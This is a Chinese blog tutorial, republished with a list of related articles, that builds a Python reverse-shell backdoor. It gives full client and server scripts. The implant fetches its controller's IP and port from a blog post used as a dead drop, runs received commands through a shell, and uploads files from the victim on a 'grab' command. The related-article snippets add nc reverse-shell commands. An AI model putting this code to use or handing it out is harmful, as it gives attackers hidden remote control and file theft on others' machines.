Python 反弹shell后门用51CTO Blog绑定

简介:

前言:仅做交流,仅做交流。

  除了51CTO当然也可以用其他的媒介啦,比如微博,微信等。这里就用51CTO吧

思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件!


  在说说什么是反弹Shell,反弹shell的好处在于被攻击的主机可能限制了进口,即只允许某个端口的链接,其他链接都屏蔽,这个时候我们就需要被攻击的主机主动来连我们的服务器,我们的服务器只要监听某个端口,等着被攻击的主机来连即可。

实现原理:

  目标主机访问51CTO网站,获取需要连接的服务器IP及端口。

  wKiom1awQXPyZvSoAAA33ruNj2U510.png


怎么实现呢?

注:因为是教育目的性质,所以这里不会涉及什么更高级的功能,更高级的我也不会,这里就只是说明简单的TCP CLient,TCP Server端


首先创建一个简单的TCP服务端,用来监听连接过来的TCP CLient

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#coding:utf-8
import  socket
def  connect():
     ###初始socket对象
     =  socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     ###绑定IP跟端口
     s.bind(( "IP" ,PORT))
     ###允许一个连接,自行设定
     s.listen( 1 )
     
     ###调用accept方法,开始监听
     conn,addr  =  s.accept()
     ###输出client的连接信息,返回结果是一个ip加端口的元组
     print  "---> we got a connection from: " ,addr
     ###循化用于接收发送的命令
     while  True :
         command  =  raw_input ( "shell>" )
         ###如果命令中用exit关键词则关闭连接
         if  "exit"  in  command:
             conn.send( "exit" )
             conn.close()
             break
         else :
             conn.send(command)
             print  conn.recv( 1024 )
def  main():
     connect()
if  __name__  = =  '__main__' :
     main()

然后我们创建TCP客户端,用来连接TCP 服务端

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import  socket
import  subprocess
import  os
host  =  "服务端IP"
port  =  服务端PORT
def  connect(host,port):
     =  socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.connect((host,port))
     while  True :
         command  =  s.recv( 1024 )
         if  "exit"  in  command:
             s.close()
             break
         else :
             ###将服务端发送过来的命令通过subprocess执行
             CMD  =  subprocess.Popen(command,shell = True ,stdout = subprocess.PIPE,stderr = subprocess.PIPE,stdin = subprocess.PIPE)
             ###返回标注输出,错误等
             s.send(CMD.stdout.read())
             s.send(CMD.stderr.read())
def  main():
     connect(host,port)
if  __name__  = =  '__main__' :
     main()

因为没有判断连接不上服务端的情况,所以我们得先运行服务端,然后运行客户端,运行结果如下

wKioL1awQgPAuW6lAABB4NOE1J4807.png

至此,第一步完成了。

现在我们需要将服务端的IP及端口放到51CTO Blog上。

wKioL1awQiLz-AGuAAC8k3emKDw693.png

现在创建一篇如上图所示的博文。

然后用requests,beautifulSoup这两个库来获取我们想要的信息

import requests

import json

from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"

在获取之前简单踩个点。

wKioL1awQmnQw3yfAAB_1Os4TxE572.png

    通过Chrom的调试模式,我们找到这段内容所对应的内容,比如div,class之类的,如上图所示我们找到的class="artContent mt10",这就是我们想要的信息,当然了,怎么用beautifulSoup筛选出我们需要的信息有很多种方法,这就就不一样说明了。

def getHost(url):

    ret = requests.get(url).content

    soup = BeautifulSoup(ret,"html.parser")

    for i in soup.find_all("div",class_="artContent mt10"):

        if i.string.startswith(" {"):

            ret = str(i.string)

    ret = json.loads(ret)

    return ret["host"],ret["port"]

print getHost(url)

运行结果如下

wKiom1awQjDz-nn0AAANVm3uR7w677.png

至此,第二部也完成了,完整代码如下

客户端py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import  socket
import  subprocess
import  os
import  requests
import  json
from  bs4  import  BeautifulSoup
url  =  "http://youerning.blog.51cto.com/"
def  transfer(s,path):
     if  os.path.exists(path):
         =  open (path, "rb" )
         packet  =  f.read( 1024 )
         while  packet ! =  "":
             s.send(packet)
             packet  =  f.read( 1024 )
         s.send( "Done" )
         f.close()
def  getHost(url):
     ret  =  requests.get(url).content
     soup  =  BeautifulSoup(ret, "html.parser" )
     for  in  soup.find_all( "div" , class_ = "artContent mt10" ):
         if  i.string.startswith( " {" ):
             ret  =  str (i.string)
     ret  =  json.loads(ret)
     return  ret[ "host" ],ret[ "port" ]
def  connect(host,port):
     =  socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.connect((host,port))
     while  True :
         command  =  s.recv( 1024 )
         if  "exit"  in  command:
             s.close()
             break
         elif  "grab"  in  command:
             grab,path  =  command.split( "*" )
             try :
                 transfer(s,path)
             except  Exception,e:
                 s.send( str (e))
                 pass
         else :
             CMD  =  subprocess.Popen(command,shell = True ,stdout = subprocess.PIPE,stderr = subprocess.PIPE,stdin = subprocess.PIPE)
             s.send(CMD.stdout.read())
             s.send(CMD.stderr.read())
def  main():
     host,port  =   getHost(url)
     connect(host,port)
main()

服务端py文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#coding:utf-8
import  socket
IP  =  "你的IP"
PORT  =  绑定的端口
def  transfer(conn,command):
     conn.send(command)
     =  open ( "text.text" , "wb" )
     while  True :
         bits  =  conn.recv( 1024 )
         if  "Unable to find out the file"  in  bits:
             print  "---- Unbale to"
             break
         if  bits.endswith( "Done" ):
             print  "Done"
             f.close()
             break
         f.write(bits)
     f.close()
def  connect():
     =  socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.bind(( "IP" ,PORT))
     s.listen( 1 )
     conn,addr  =  s.accept()
     print  "---> we got a connection from: " ,addr
     while  True :
         command  =  raw_input ( "shell>" )
         if  "exit"  in  command:
             conn.send( "exit" )
             conn.close()
             break
         elif  "grab"  in  command:
             transfer(conn,command)
         else :
             conn.send(command)
             print  conn.recv( 1024 )
def  main():
     connect()
main()


后记:其实最后这两个完整的Python脚本,加了一个transfer函数,用于传输文件,算是一个彩蛋吧,虽然我不知道彩蛋是什么意思,不过还有很多功能可以加,比如查找文件,提权什么的。

    



本文转自 youerning 51CTO博客,原文链接:http://blog.51cto.com/youerning/1740646

相关文章
|
6月前
|
Shell Python
python 和shell 变量互相传递
python 和shell 变量互相传递
64 0
|
6月前
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
169 0
|
6月前
|
Python
Python网络编程基础(Socket编程)绑定地址和端口
【4月更文挑战第9天】在UDP服务器编程中,我们首先需要创建一个UDP套接字,然后绑定一个本地地址和端口,以便客户端可以通过这个地址和端口与我们的服务器进行通信。下面,我们将详细讲解如何绑定地址和端口。
|
6月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
443 0
|
Python
145 python网络编程 - UDP绑定信息
145 python网络编程 - UDP绑定信息
54 0
|
6月前
|
人工智能 Shell 程序员
[oeasy]python005_退出游乐场_重启游乐场_系统态shell_应用态_quit
[oeasy]python005_退出游乐场_重启游乐场_系统态shell_应用态_quit
51 0
|
1月前
|
监控 Shell 数据处理
Python执行Shell并获取结果的全面指南
Python执行Shell并获取结果的全面指南
165 1
|
3月前
|
Unix Shell Python
在Shell中转换Python正则表达式
结合以上提到的注意事项与差异点,就能在Shell环境中巧妙地转换并使用Python正则表达式了。务实和节省时间的做法是,将一些常见Python正则模式记在手边,随时查阅并对照POSIX标准进行调整。同时,借助在线正则表达式测试器和文档也能有效地提升在Shell环境中处理正则表达式的能力。
48 5
|
3月前
|
Shell 数据处理 C++
【震撼揭秘】Python正则VS Shell正则:一场跨越编程边界的史诗级对决!你绝不能错过的精彩较量,带你领略文本处理的极致魅力!
【8月更文挑战第19天】正则表达式是文本处理的强大工具,在Python与Shell中有广泛应用。两者虽语法各异,但仍共享许多基本元素,如`.`、`*`及`[]`等。Python通过`re`模块支持丰富的功能,如非捕获组及命名捕获组;而Shell则依赖`grep`、`sed`和`awk`等命令实现类似效果。尽管Python提供了更高级的特性和函数,Shell在处理文本文件方面仍有其独特优势。选择合适工具需根据具体需求和个人偏好决定。
38 1
|
3月前
|
存储 Shell 数据安全/隐私保护
minio一键安装脚本分享(shell和python)
minio一键安装脚本分享(shell和python)
70 0
下一篇
无影云桌面